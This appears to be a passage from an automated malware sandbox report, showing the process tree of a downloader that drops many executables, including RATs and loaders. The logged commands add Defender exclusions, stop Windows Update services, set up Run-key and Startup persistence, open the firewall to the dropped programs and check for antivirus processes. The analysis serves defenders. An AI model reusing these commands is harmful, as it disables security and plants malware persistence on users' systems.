                                                                  powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                  6⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1924
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
                                                                5⤵
                                                                  PID:2600
                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                    sc stop UsoSvc
                                                                    6⤵
                                                                    • Launches sc.exe
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2168
                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                    sc stop WaaSMedicSvc
                                                                    6⤵
                                                                    • Launches sc.exe
                                                                    PID:556
                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                    sc stop wuauserv
                                                                    6⤵
                                                                    • Launches sc.exe
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:1724
                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                    sc stop DoSvc
                                                                    6⤵
                                                                    • Launches sc.exe
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2860
                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                    sc stop BITS
                                                                    6⤵
                                                                    • Launches sc.exe
                                                                    PID:2916
                                                                • C:\Users\Admin\AppData\Local\Temp\2362724532.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\2362724532.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:2796
                                                                • C:\Users\Admin\AppData\Local\Temp\1334316928.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\1334316928.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3040
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                    6⤵
                                                                      PID:2872
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                        7⤵
                                                                          PID:2368
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                        6⤵
                                                                          PID:1356
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                            7⤵
                                                                              PID:2880
                                                                        • C:\Users\Admin\AppData\Local\Temp\136198103.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\136198103.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:2808
                                                                        • C:\Users\Admin\AppData\Local\Temp\1960333372.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\1960333372.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:2860
                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\unison.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\unison.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:2208
                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\6.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\6.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:1280
                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\shttpsr_mg.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\shttpsr_mg.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:820
                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\neonn.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\neonn.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:872
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "cmd" /c ping 127.0.0.1 -n 6 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "neon" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\neon.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                        PID:2136
                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                          ping 127.0.0.1 -n 6
                                                                          5⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                          • Runs ping.exe
                                                                          PID:3248
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "neon" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\neon.exe"
                                                                          5⤵
                                                                          • Adds Run key to start application
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3996
                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                        4⤵
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:3204
                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                          5⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:2376
                                                                      • C:\Users\Admin\AppData\Local\Temp\neon.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\neon.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:820
                                                                        • C:\Users\Admin\AppData\Local\Temp\neon.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\neon.exe"
                                                                          5⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:5464
                                                                          • C:\Users\Admin\AppData\Local\Temp\neon.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\neon.exe"
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:4140
                                                                      • C:\Users\Admin\AppData\Local\Temp\neon.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\neon.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:6016
                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                        4⤵
                                                                          PID:7000
                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\AnneSalt.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\AnneSalt.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Drops file in Windows directory
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:3856
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k move Technique Technique.cmd & Technique.cmd & exit
                                                                          4⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:1564
                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                            tasklist
                                                                            5⤵
                                                                            • Enumerates processes with tasklist
                                                                            PID:3244
                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                            findstr /I "wrsa.exe opssvc.exe"
                                                                            5⤵
                                                                              PID:3788
                                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                                              tasklist
                                                                              5⤵
                                                                              • Enumerates processes with tasklist
                                                                              PID:1464
                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                              findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
                                                                              5⤵
                                                                                PID:2940
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /c md 79556
                                                                                5⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:3912
                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                findstr /V "SpecificationsRemainExtraIntellectual" Compile
                                                                                5⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:996
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /c copy /b Cruz + Occupations + Grab + Recovery 79556\J
                                                                                5⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:1652
                                                                              • C:\Users\Admin\AppData\Local\Temp\79556\Boxing.pif
                                                                                Boxing.pif J
                                                                                5⤵
                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:2832
                                                                              • C:\Windows\SysWOW64\choice.exe
                                                                                choice /d y /t 5
                                                                                5⤵
                                                                                  PID:3908
                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\SteamDetector.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\SteamDetector.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:984
                                                                              • C:\Users\Admin\AppData\Roaming\SteamDetector.exe
                                                                                "C:\Users\Admin\AppData\Roaming\SteamDetector.exe"
                                                                                4⤵
                                                                                • Drops startup file
                                                                                • Executes dropped EXE
                                                                                • Adds Run key to start application
                                                                                • Drops autorun.inf file
                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                PID:1456
                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\SteamDetector.exe" "SteamDetector.exe" ENABLE
                                                                                  5⤵
                                                                                  • Modifies Windows Firewall
                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                  PID:3536
                                                                                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                  dw20.exe -x -s 548
                                                                                  5⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:6948
                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\Neverlose%20Loader.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\Neverlose%20Loader.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              PID:3160
                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\23c2343.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\23c2343.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              PID:1408
                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\frap.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\frap.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              PID:2856
                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\rat.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\rat.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              PID:2752
                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\rat.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\rat.exe"
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                PID:1252
                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\r.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\r.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Adds Run key to start application
                                                                              • Drops file in Windows directory
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:2136
                                                                              • C:\Windows\sysvplervcs.exe
                                                                                C:\Windows\sysvplervcs.exe
                                                                                4⤵
                                                                                  PID:2920
                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\cryptography_module_windows.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\cryptography_module_windows.exe"
                                                                                3⤵
                                                                                  PID:3728
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\cryptography_module_windows.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\cryptography_module_windows.exe"
                                                                                    4⤵
                                                                                      PID:6040
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\legas.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\legas.exe"
                                                                                    3⤵
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:4788
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      4⤵
                                                                                        PID:5412
                                                                                        • C:\Users\Admin\AppData\Roaming\kcS1bmnZOz.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\kcS1bmnZOz.exe"
                                                                                          5⤵
                                                                                            PID:2680
                                                                                          • C:\Users\Admin\AppData\Roaming\XXzcdjThSk.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\XXzcdjThSk.exe"
                                                                                            5⤵
                                                                                              PID:6408
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 52
                                                                                            4⤵
                                                                                            • Program crash
                                                                                            PID:3444
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Files\pi.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\Files\pi.exe"
                                                                                          3⤵
                                                                                            PID:4112
                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\foggy-mountains.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\foggy-mountains.exe"
                                                                                            3⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1316
                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\XClient_protected.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\XClient_protected.exe"
                                                                                            3⤵
                                                                                              PID:3704
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\a.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\a.exe"
                                                                                              3⤵
                                                                                              • Adds Run key to start application
                                                                                              • Drops file in Windows directory
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:4764
                                                                                              • C:\Users\Admin\sysvplervcs.exe
                                                                                                C:\Users\Admin\sysvplervcs.exe
                                                                                                4⤵
                                                                                                  PID:3608
                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                              "C:\Windows\system32\rundll32.exe" shell32.dll,Options_RunDLL 7
                                                                                              2⤵
                                                                                                PID:2876
                                                                                              • C:\Windows\explorer.exe
                                                                                                "C:\Windows\explorer.exe"
                                                                                                2⤵
                                                                                                  PID:2340
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                  2⤵
                                                                                                  • Enumerates system info in registry
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                  PID:1208
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef3cd9758,0x7fef3cd9768,0x7fef3cd9778
                                                                                                    3⤵
                                                                                                      PID:1228
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1164 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:2
                                                                                                      3⤵
                                                                                                        PID:2972
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:8
                                                                                                        3⤵
                                                                                                          PID:1564
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1616 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:8
                                                                                                          3⤵
                                                                                                            PID:2212
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2300 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:1
                                                                                                            3⤵
                                                                                                              PID:236
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2308 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:1
                                                                                                              3⤵
                                                                                                                PID:2448
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1364 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:2
                                                                                                                3⤵
                                                                                                                  PID:1628
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1356 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:1
                                                                                                                  3⤵
                                                                                                                    PID:2524
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3676 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:8
                                                                                                                    3⤵
                                                                                                                      PID:2920
                                                                                                                    • C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level
                                                                                                                      3⤵
                                                                                                                        PID:2912
                                                                                                                        • C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x154,0x158,0x15c,0x128,0x160,0x1400d7688,0x1400d7698,0x1400d76a8
                                                                                                                          4⤵
                                                                                                                            PID:2580
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3712 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:1
                                                                                                                          3⤵
                                                                                                                            PID:1256
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:8
                                                                                                                            3⤵
                                                                                                                              PID:3032
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2752 --field-trial-handle=1324,i,13740333432403932250,10561983489563401596,131072 /prefetch:8
                                                                                                                              3⤵
                                                                                                                              • Drops file in Windows directory
                                                                                                                              • Modifies registry class
                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:1712
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
                                                                                                                                4⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Modifies system certificate store
                                                                                                                                PID:2472
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Files\Identification-1.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\Identification-1.exe"
                                                                                                                                  5⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:3564
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Files\tt.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\tt.exe"
                                                                                                                                  5⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:3384
                                                                                                                                  • C:\Windows\sysmablsvr.exe
                                                                                                                                    C:\Windows\sysmablsvr.exe
                                                                                                                                    6⤵
                                                                                                                                    • Modifies security service
                                                                                                                                    • Windows security bypass
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Windows security modification
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Suspicious behavior: SetClipboardViewer
                                                                                                                                    PID:3296
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1436610214.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\1436610214.exe
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:932
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\12382869.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\12382869.exe
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:2676
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                                                        8⤵
                                                                                                                                          PID:3172
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                                                            9⤵
                                                                                                                                              PID:748
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                                                            8⤵
                                                                                                                                              PID:4036
                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                                                                9⤵
                                                                                                                                                  PID:1512
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1832728749.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\1832728749.exe
                                                                                                                                              7⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3584
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1665822621.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\1665822621.exe
                                                                                                                                              7⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3092
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Files\testme.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Files\testme.exe"
                                                                                                                                          5⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                          PID:2352
                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                            netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\testme.exe" "testme.exe" ENABLE
                                                                                                                                            6⤵
                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                            PID:1212
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe"
                                                                                                                                          5⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:3608
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c copy Confirmed Confirmed.cmd & Confirmed.cmd
                                                                                                                                            6⤵
                                                                                                                                              PID:1284
                                                                                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                tasklist
                                                                                                                                                7⤵
                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                PID:1232
                                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                findstr /I "wrsa.exe opssvc.exe"
                                                                                                                                                7⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:3916
                                                                                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                tasklist
                                                                                                                                                7⤵
                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                PID:780
                                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                                                                                                                                7⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:3408
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /c md 768318
                                                                                                                                                7⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:1212
                                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                findstr /V "PhoneAbcSchedulesApr" Nbc
                                                                                                                                                7⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:3484
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /c copy /b Challenged + Diy + Teachers + California + Mba + Yarn + Payable + Zdnet + Plumbing + Pe + Trick + Betting + Absence + Motorcycles + Man + Analyst + Max + Patrick + Pg + Exemption + Sight 768318\B
                                                                                                                                                7⤵
                                                                                                                                                  PID:1608
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif
                                                                                                                                                  768318\Paraguay.pif 768318\B
                                                                                                                                                  7⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:2120
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & echo URL="C:\Users\Admin\AppData\Local\TradeInsight Technologies\TradeWise.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & exit
                                                                                                                                                    8⤵
                                                                                                                                                    • Drops startup file
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:3472
